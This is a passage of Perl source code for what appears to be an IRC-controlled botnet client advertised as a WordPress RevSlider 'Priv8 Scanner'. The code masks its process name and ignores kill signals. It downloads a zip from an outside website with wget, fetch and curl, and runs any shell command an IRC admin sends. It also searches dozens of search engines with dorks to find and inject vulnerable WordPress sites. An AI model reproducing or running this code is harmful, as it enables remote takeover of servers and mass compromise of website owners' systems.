  133. my $jack3 = "".$fullmagic3."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  134. my $jack4 = "".$fullmagic4."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  135. my $jack5 = "".$fullmagic5."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  136. my $jack6 = "".$fullmagic6."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  137. my $jack7 = "".$fullmagic7."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  138. my $jack8 = "".$fullmagic8."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  139. my $jack9 = "".$fullmagic9."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  140. my $jack10 = "".$fullmagic10."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  141. my $jack11 = "".$fullmagic11."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  142. my $jack12 = "".$fullmagic12."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  143. my $jack13 = "".$fullmagic13."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  144. my $jack14 = "".$fullmagic14."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  145. my $jack15 = "".$fullmagic15."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  146. my $jack16 = "".$fullmagic16."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  147. my $jack17 = "".$fullmagic17."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  148. my $jack18 = "".$fullmagic18."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  149. my $jack19 = "".$fullmagic19."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  150. my $jack20 = "".$fullmagic20."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  151.  
  152.  
  153.  
  154. if (@ARGV == 7) {
  155. print "\n[+] nob0dy Priv8 Scanner SE\n".
  156. "[+] IRC Host : $ircserver\n".
  157. "[+] IRC Port : $ircport\n".
  158. "[+] Bot Nick : $nickname\n".
  159. "[+] Bot Ident : $ident\n".
  160. "[+] Channel : $channel\n".
  161. "[+] Bot Admin : $admin\n".
  162. "[+] Process/PID : $fakeproc - $$\n\n";
  163. }
  164.  
  165. $SIG{'INT'} = 'IGNORE';
  166. $SIG{'HUP'} = 'IGNORE';
  167. $SIG{'TERM'} = 'IGNORE';
  168. $SIG{'CHLD'} = 'IGNORE';
  169. $SIG{'PS'} = 'IGNORE';
  170.  
  171. chdir("/tmp");
  172. chop (my $priper = `wget http://www.viverosgimeno.es/wp-content/rac/revslider.zip;fetch http://www.viverosgimeno.es/wp-content/rac/revslider.zip;curl -O http://www.viverosgimeno.es/wp-content/rac/revslider.zip`);
  173. $ircserver = "$ARGV[0]" if $ARGV[0];
  174. $0 = "$fakeproc"."\0" x 16;
  175. my $pid = fork;
  176. exit if $pid;
  177. die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
  178.  
  179. our %irc_servers;
  180. our %DCC;
  181. my $dcc_sel = new IO::Select->new();
  182. $sel_client = IO::Select->new();
  183.  
  184. sub sendraw {
  185. if ($#_ == '1') {
  186. my $socket = $_[0];
  187. print $socket "$_[1]\n";
  188. } else {
  189. print $IRC_cur_socket "$_[0]\n";
  190. }
  191. }
  192.  
  193. sub connector {
  194. my $mynick = $_[0];
  195. my $ircserver_con = $_[1];
  196. my $ircport_con = $_[2];
  197. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
  198. if (defined($IRC_socket)) {
  199. $IRC_cur_socket = $IRC_socket;
  200. $IRC_socket->autoflush(1);
  201. $sel_client->add($IRC_socket);
  202. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
  203. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
  204. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  205. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
  206. nick("$mynick");
  207. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
  208. sleep 1;
  209. }
  210. }
  211.  
  212. sub parse {
  213. my $servarg = shift;
  214. if ($servarg =~ /^PING \:(.*)/) {
  215. sendraw("PONG :$1");
  216. }
  217. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  218. if (lc($1) eq lc($mynick)) {
  219. $mynick = $4;
  220. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  221. }
  222. }
  223. elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  224. nick("$mynick".int rand(999));
  225. }
  226. elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  227. $mynick = $2;
  228. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
  229. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  230. sendraw("MODE $mynick +Bx");
  231. sendraw("NS id lfi123");
  232. sleep(3);
  233. sendraw("JOIN $channel");
  234. sleep(1);
  235. sendraw("JOIN #shock 777");
  236. sleep(1);
  237. sendraw("PRIVMSG $channel :4SexCrime Database Rev Wordpress Priv8 Scanner SE v5.1");
  238. sendraw("PRIVMSG $admin :Hi $admin im here ready to Serve !!!");
  239. }
  240. }
  241.  
  242. my $line_temp;
  243. while( 1 ) {
  244. while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
  245. select(undef, undef, undef, 0.01);
  246. delete($irc_servers{''}) if (defined($irc_servers{''}));
  247. my @ready = $sel_client->can_read(0);
  248. next unless(@ready);
  249. foreach $fh (@ready) {
  250. $IRC_cur_socket = $fh;
  251. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  252. $nread = sysread($fh, $ircmsg, 4096);
  253. if ($nread == 0) {
  254. $sel_client->remove($fh);
  255. $fh->close;
  256. delete($irc_servers{$fh});
  257. }
  258. @lines = split (/\n/, $ircmsg);
  259. $ircmsg =~ s/\r\n$//;
  260.  
  261. if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  262. my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  263. my $engine ="UAE,Myanmar,Argentina,Austria,Australia,Brazil,Canada,Chili,CoMersil,Czech,Germany,Denmark,Spain,Europe,France,Hungary,Indonesia,Israel,India,Info,Iran,Italy,Japan,Korea,Mexico,Malaysia,Network,Netherlands,Organization,Philippines,Polan,Romania,Russian,Thailand,Ukraine,England,USA,Slovenia,Belgium,Bussines,SouthAfrica,Vietnam,Tuvalu,Cocos,Turky,Asia,Serbia,Singapore,Taiwan,Sweden,Pakistan,Norway,Montenegro,Greece,Education,Goverment,Kazakhstan,
  264. Afganistan,Albania,Algeria,Angola,Armenia,Azerbaijan,Bahrain,Bangladesh,Belarus,Bhutan,Bolivia,Bosnia,Bulgaria,Brunei,Cambodia,Cameroon,Christmas,CostaRika,Croatia,Cuba,Cyprus,Dominican,Equador,Egypt,Estonia,Finland,Georgia,Ghana,Grenada,Honduras,Hongkong,Iceland,Ireland,Kenya,Kuwait,Laos,Latvia,Liberia,
  265. Libyan,Lithuania,Macedonia,Malta,Mongolia,Mozambique,Namibia,Nauru,Nepal,NewZealand,Nigeria,Paraguay,Peru,Portugal,PuertoRico,Qatar,SaintLucia,Samoa,SaudiArabia,Senegal,Slovakia,Srilanka,Swaziland,Tajikistan,Tanzania,Tokelau,Tonga,Tunisia,Uruguay,Uzbekistan,Venezuela,Yemen,Yugoslavia,Zambia,Uganda,Trinidad,Zimbabwe,
  266. KonToL,PePek,TeTek,ItiL,Vagina,NenNen,SuSu,BuahDada,PayuDara,Kentot,eMeL,OraL,Klitoris,Masturbasi,Onani,Sperma,AnaL,Puting,Penis,MeMek,
  267. GooGLeCA,GooGLeDE,GooGLeUK,GooGLeFR,GooGLeES,GooGLeIT,GooGLeNL,GooGLeBE,GooGLeCH,GooGLeSE,GooGLeDK,GooGLeNO,GooGLeNZ,GooGLeIE,GooGLeBR,GooGLeAR,GooGLeCO,GooGLeCU,GooGLeCL,GooGLeMX,GooGLeAU,GooGLeRU,GooGLeAT,GooGLePL,GooGLeIL,GooGLeTR,GooGLeUA,GooGLeGR,GooGLeJP,GooGLeCN,GooGLeMY,GooGLeTH,GooGLeIN,GooGLeKR,GooGLeRO,GooGLeTW,GooGLeZA,GooGLePT,BingDE,BingUK,BingCA,BingBR,BingFR,BingES,BingIT,BingBE,BingNL,BingPT,BingNO,BingDK,BingSE,BingCH,BingNZ,BingRU,BingJP,BingCN,BingKR,BingMX,BingAR,BingCL,BingAU,AsKCA,AsKDE,AsKIT,AsKFR,AsKES,AsKRU,AsKNL,AsKUK,AsKBR,AsKPL,AsKAU,AsKAT,AsKJP,AsKSE,AsKMX,AsKNO,AsKDK";
  268. if ($path eq $mynick) {
  269. if ($msg =~ /^PING (.*)/) {
  270. sendraw("NOTICE $nick :PING $1");
  271. }
  272. #if ($msg =~ /^VERSION/) {
  273. # sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey");
  274. #}
  275. if ($msg =~ /^TIME/) {
  276. sendraw("NOTICE $nick :TIME ".$datetime."");
  277. }
  278. if (&isAdmin($nick) && $msg eq "!die") {
  279. &shell("$path","kill -9 $$");
  280. }
  281. if (&isAdmin($nick) && $msg eq "!killall") {
  282. &shell("$path","killall -9 perl");
  283. }
  284. if (&isAdmin($nick) && $msg eq "!reset") {
  285. sendraw("QUIT :Restarting...");
  286. }
  287. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  288. sendraw("JOIN #".$1);
  289. }
  290. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  291. sendraw("PART #".$1);
  292. }
  293. if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
  294. sendraw("NICK ".$1);
  295. }
  296. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  297. sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
  298. }
  299. if (&isAdmin($nick) && $msg !~ /^!/) {
  300. &shell("$nick","$msg");
  301. }
  302. }
  303. else {
  304. if (&isAdmin($nick) && $msg eq "!die") {
  305. &shell("$path","kill -9 $$");
  306. }
  307. if (&isAdmin($nick) && $msg eq "!killall") {
  308. &shell("$path","killall -9 perl");
  309. }
  310. if (&isAdmin($nick) && $msg eq "!reset") {
  311. sendraw("QUIT :Restarting...");
  312. }
  313. if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
  314. sendraw("JOIN #".$1);
  315. }
  316. if (&isAdmin($nick) && $msg eq "!part") {
  317. sendraw("PART $path");
  318. }
  319. if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
  320. sendraw("PART #".$1);
  321. }
  322. if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  323. &shell("$path","$1");
  324. }
  325. if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
  326. &shell("$path","$1");
  327. }
  328. if (&isAdmin($nick) && $msg =~ /^!addadmin\ (.+) /) {
  329. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  330. $newadmin = $1;
  331. $admin = $newadmin;
  332. &msg("$path","12 Admin added to4 $admin ");
  333. }}}
  334. ##################################################################### HELP COMMAND
  335.  
  336. if ($msg=~ /^!help/) {
  337. my $helplogo = "15(7@2Help15)";
  338. $inject = "";
  339. if (-e ($update_file)){ $inject = "3Ready!!!"; } else { $inject = "4Lost!!!"; }
  340. &msg("$nick","$helplogo 12RevSlider Database Wordpress Scan:6 $revcmd [dork]");
  341. # &msg("$nick","$helplogo 12RevSlider Database Wordpress Inject manual:6 $chkcmd [site]");
  342. &msg("$nick","$helplogo 12Injector : $inject ");
  343. &msg("$nick","$helplogo 12Check Bypass:6 !bypassrev");
  344. }
  345. if ($msg=~ /^!response/ || $msg=~ /^!id/) {
  346. $inject = "";
  347. if (-e ($update_file)){ $inject = "3Ready!!!"; } else { $inject = "4Lost!!!"; }
  348. &msg("$path","12Injector : $inject ");
  349. }
  350.  
  351. if (&isAdmin($nick) && $msg =~ /^!pid/) {
  352. &notice("$nick","6Fake Process/PID : $fakeproc - $$");
  353. }
  354. if ($msg=~/^!bypassrev/){
  355. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  356. &msg("$path","Checking 20 Bypass, please wait...");
  357. my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";my $bystats6 = "";my $bystats7 = "";my $bystats8 = "";my $bystats9 = "";my $bystats10 = "";
  358. my $bystats11 = "";my $bystats12 = "";my $bystats13 = "";my $bystats14 = "";my $bystats15 = "";my $bystats16 = "";my $bystats17 = "";my $bystats18 = "";my $bystats19 = "";my $bystats20 = "";
  359. my $cekby1 = &get_content($jack1."search");
  360. if ($cekby1 =~ /search/i){ $bystats1 = "6Up!!!"; } else { $bystats1 = "4lost!!!"; }
  361. my $cekby2 = &get_content($jack2."search");
  362. if ($cekby2 =~ /search/i){ $bystats2 = "6Up!!!"; } else { $bystats2 = "4lost!!!"; }
  363. my $cekby3 = &get_content($jack3."search");
  364. if ($cekby3 =~ /search/i){ $bystats3 = "6Up!!!"; } else { $bystats3 = "4lost!!!"; }
  365. my $cekby4 = &get_content($jack4."search");
  366. if ($cekby4 =~ /search/i){ $bystats4 = "6Up!!!"; } else { $bystats4 = "4lost!!!"; }
  367. my $cekby5 = &get_content($jack5."search");
  368. if ($cekby5 =~ /search/i){ $bystats5 = "6Up!!!"; } else { $bystats5 = "4lost!!!"; }
  369. my $cekby6 = &get_content($jack6."search");
  370. if ($cekby6 =~ /search/i){ $bystats6 = "6Up!!!"; } else { $bystats6 = "4lost!!!"; }
  371. my $cekby7 = &get_content($jack7."search");
  372. if ($cekby7 =~ /search/i){ $bystats7 = "6Up!!!"; } else { $bystats7 = "4lost!!!"; }
  373. my $cekby8 = &get_content($jack8."search");
  374. if ($cekby8 =~ /search/i){ $bystats8 = "6Up!!!"; } else { $bystats8 = "4lost!!!"; }
  375. my $cekby9 = &get_content($jack9."search");
  376. if ($cekby9 =~ /search/i){ $bystats9 = "6Up!!!"; } else { $bystats9 = "4lost!!!"; }
  377. my $cekby10 = &get_content($jack10."search");
  378. if ($cekby10 =~ /search/i){ $bystats10 = "6Up!!!"; } else { $bystats10 = "4lost!!!"; }
  379. my $cekby11 = &get_content($jack11."search");
  380. if ($cekby11 =~ /search/i){ $bystats11 = "6Up!!!"; } else { $bystats11 = "4lost!!!"; }
  381. my $cekby12 = &get_content($jack12."search");
  382. if ($cekby12 =~ /search/i){ $bystats12 = "6Up!!!"; } else { $bystats12 = "4lost!!!"; }
  383. my $cekby13 = &get_content($jack13."search");
  384. if ($cekby13 =~ /search/i){ $bystats13 = "6Up!!!"; } else { $bystats13 = "4lost!!!"; }
  385. my $cekby14 = &get_content($jack14."search");
  386. if ($cekby14 =~ /search/i){ $bystats14 = "6Up!!!"; } else { $bystats14 = "4lost!!!"; }
  387. my $cekby15 = &get_content($jack15."search");
  388. if ($cekby15 =~ /search/i){ $bystats15 = "6Up!!!"; } else { $bystats15 = "4lost!!!"; }
  389. my $cekby16 = &get_content($jack16."search");
  390. if ($cekby16 =~ /search/i){ $bystats16 = "6Up!!!"; } else { $bystats16 = "4lost!!!"; }
  391. my $cekby17 = &get_content($jack17."search");
  392. if ($cekby17 =~ /search/i){ $bystats17 = "6Up!!!"; } else { $bystats17 = "4lost!!!"; }
  393. my $cekby18 = &get_content($jack18."search");
  394. if ($cekby18 =~ /search/i){ $bystats18 = "6Up!!!"; } else { $bystats18 = "4lost!!!"; }
  395. my $cekby19 = &get_content($jack19."search");
  396. if ($cekby19 =~ /search/i){ $bystats19 = "6Up!!!"; } else { $bystats19 = "4lost!!!"; }
  397. my $cekby20 = &get_content($jack20."search");
  398. if ($cekby20 =~ /search/i){ $bystats20 = "6Up!!!"; } else { $bystats20 = "4lost!!!"; }
  399. &msg("$path","12 Mesin1= $bystats1 12Mesin2= $bystats2 12Mesin3= $bystats3 12Mesin4= $bystats4 12Mesin5= $bystats5 12 Mesin6= $bystats6 12Mesin7= $bystats7 12Mesin8= $bystats8 12Mesin9= $bystats9 12Mesin10= $bystats10 12 Mesin11= $bystats11 12Mesin12= $bystats12 12Mesin13= $bystats13 12Mesin14= $bystats14 12Mesin15= $bystats15 12 Mesin16= $bystats16 12Mesin17= $bystats17 12Mesin18= $bystats18 12Mesin19= $bystats19 12Mesin20= $bystats20")
  400. }}}
  401. ##################################################################### Command SCAN
  402.  
  403.  
  404. if ($msg =~ /^$revcmd\s+(.*)/) {
  405. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  406. if (-e ($update_file)) {
  407. my $dork = $1;
  408. my $check = &read_dorks($dork);
  409. if ($check == 1) {
  410. &msg("$path","$searchlogo 4Ga bisa $nick bangsattt...itu2 aja dorkmu boss.. "); exit;
  411. } else {
  412. &msg("$path","$searchlogo 3Si $nick lagi scan Revslider Plugins Wordpress di $path ");
  413. &msg("$path","$searchlogo 12Dork :4 $dork");
  414. &msg("$path","$searchlogo 12Please wait for 1 hour from now..");
  415. sendraw("MODE $path +m");
  416. &write_dorks($dork);
  417. &se_start($path,$bug,$dork,$engine,1,$nick);
  418. }
  419. }else {
  420. &msg("$path","[ $nick ] $revlogo 4Injector is Lost!");
  421. }
  422. }
  423. exit;
  424. }
  425. }
  426.  
  427.  
  428. #####################################################################
  429.  
  430. }
  431. }
  432.  
  433. for(my $c=0; $c<= $#lines; $c++) {
  434. $line = $lines[$c];
  435. $line = $line_temp.$line if ($line_temp);
  436. $line_temp = '';
  437. $line =~ s/\r$//;
  438. unless ($c == $#lines) {
  439. parse("$line");
  440. } else {
  441. if ($#lines == 0) {
  442. parse("$line");
  443. } elsif ($lines[$c] =~ /\r$/) {
  444. parse("$line");
  445. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  446. parse("$line");
  447. } else {
  448. $line_temp = $line;
  449. }
  450. }
  451. }
  452. }
  453. }
  454.  
  455. ########################################################################################## Search engine
  456. sub type() {
  457. my ($chan,$bug,$dork,$engine,$type,$nick) = @_;
  458. if ($type == 1){$type=&revslider($chan,$bug,$dork,$engine,$nick);}
  459. elsif ($type == 2){$type=&showbiz($chan,$bug,$dork,$engine,$nick);}
  460. }
  461. sub se_start() {
  462. my ($chan,$bug,$dork,$engine,$type,$nick) = @_;
  463. if ($engine =~ /uae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"UAE",$type,$nick); } exit; } }
  464. if ($engine =~ /myanmar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,dork,"Myanmar",$type,$nick); } exit; } }
  465. if ($engine =~ /argentina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Argentina",$type,$nick); } exit; } }
  466.  
  467. if ($engine =~ /austria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Austria",$type,$nick); } exit; } }
  468. if ($engine =~ /australia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Australia",$type,$nick); } exit; } }
  469. if ($engine =~ /brazil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brazil",$type,$nick); } exit; } }
  470. if ($engine =~ /canada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Canada",$type,$nick); } exit; } }
  471. if ($engine =~ /chili/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Chili",$type,$nick); } exit; } }
  472. if ($engine =~ /cina/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cina",$type,$nick); } exit; } }
  473. if ($engine =~ /comersil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CoMersil",$type,$nick); } exit; } }
  474. if ($engine =~ /czech/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Czech",$type,$nick); } exit; } }
  475. if ($engine =~ /germany/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Germany",$type,$nick); } exit; } }
  476. if ($engine =~ /denmark/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Denmark",$type,$nick); } exit; } }
  477. if ($engine =~ /spain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Spain",$type,$nick); } exit; } }
  478. if ($engine =~ /europe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Europe",$type,$nick); } exit; } }
  479. if ($engine =~ /france/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"France",$type,$nick); } exit; } }
  480. if ($engine =~ /hungary/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hungary",$type,$nick); } exit; } }
  481. if ($engine =~ /indonesia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Indonesia",$type,$nick); } exit; } }
  482. if ($engine =~ /israel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Israel",$type,$nick); } exit; } }
  483. if ($engine =~ /india/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"India",$type,$nick); } exit; } }
  484. if ($engine =~ /info/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Info",$type,$nick); } exit; } }
  485. if ($engine =~ /iran/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iran",$type,$nick); } exit; } }
  486. if ($engine =~ /italy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Italy",$type,$nick); } exit; } }
  487. if ($engine =~ /japan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Japan",$type,$nick); } exit; } }
  488. if ($engine =~ /korea/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Korea",$type,$nick); } exit; } }
  489. if ($engine =~ /mexico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mexico",$type,$nick); } exit; } }
  490. if ($engine =~ /malaysia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malaysia",$type,$nick); } exit; } }
  491. if ($engine =~ /network/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Network",$type,$nick); } exit; } }
  492. if ($engine =~ /netherlands/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Netherlands",$type,$nick); } exit; } }
  493. if ($engine =~ /organization/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Organization",$type,$nick); } exit; } }
  494. if ($engine =~ /philippines/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Philippines",$type,$nick); } exit; } }
  495. if ($engine =~ /poland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Poland",$type,$nick); } exit; } }
  496. if ($engine =~ /romania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Romania",$type,$nick); } exit; } }
  497. if ($engine =~ /russian/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Russian",$type,$nick); } exit; } }
  498. if ($engine =~ /thailand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Thailand",$type,$nick); } exit; } }
  499. if ($engine =~ /ukraine/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ukraine",$type,$nick); } exit; } }
  500. if ($engine =~ /england/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"England",$type,$nick); } exit; } }
  501. if ($engine =~ /usa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"USA",$type,$nick); } exit; } }
  502. if ($engine =~ /slovenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovenia",$type,$nick); } exit; } }
  503. if ($engine =~ /belgium/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belgium",$type,$nick); } exit; } }
  504. if ($engine =~ /bussines/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bussines",$type,$nick); } exit; } }
  505. if ($engine =~ /southafrica/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SouthAfrica",$type,$nick); } exit; } }
  506. if ($engine =~ /vietnam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Vietnam",$type,$nick); } exit; } }
  507. if ($engine =~ /tuvalu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tuvalu",$type,$nick); } exit; } }
  508. if ($engine =~ /cocos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cocos",$type,$nick); } exit; } }
  509. if ($engine =~ /turky/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Turky",$type,$nick); } exit; } }
  510. if ($engine =~ /asia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Asia",$type,$nick); } exit; } }
  511. if ($engine =~ /serbia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Serbia",$type,$nick); } exit; } }
  512. if ($engine =~ /singapore/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Singapore",$type,$nick); } exit; } }
  513. if ($engine =~ /taiwan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Taiwan",$type,$nick); } exit; } }
  514. if ($engine =~ /sweden/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sweden",$type,$nick); } exit; } }
  515. if ($engine =~ /pakistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Pakistan",$type,$nick); } exit; } }
  516. if ($engine =~ /norway/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Norway",$type,$nick); } exit; } }
  517. if ($engine =~ /montenegro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Montenegro",$type,$nick); } exit; } }
  518. if ($engine =~ /greece/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Greece",$type,$nick); } exit; } }
  519. if ($engine =~ /education/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Education",$type,$nick); } exit; } }
  520. if ($engine =~ /goverment/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Goverment",$type,$nick); } exit; } }
  521. if ($engine =~ /kazakhstan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kazakhstan",$type,$nick); } exit; } }
  522. if ($engine =~ /afganistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,dork,"Afganistan",$type,$nick); } exit; } }
  523. if ($engine =~ /albania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Albania",$type,$nick); } exit; } }
  524. if ($engine =~ /algeria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Algeria",$type,$nick); } exit; } }
  525. if ($engine =~ /angola/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Angola",$type,$nick); } exit; } }
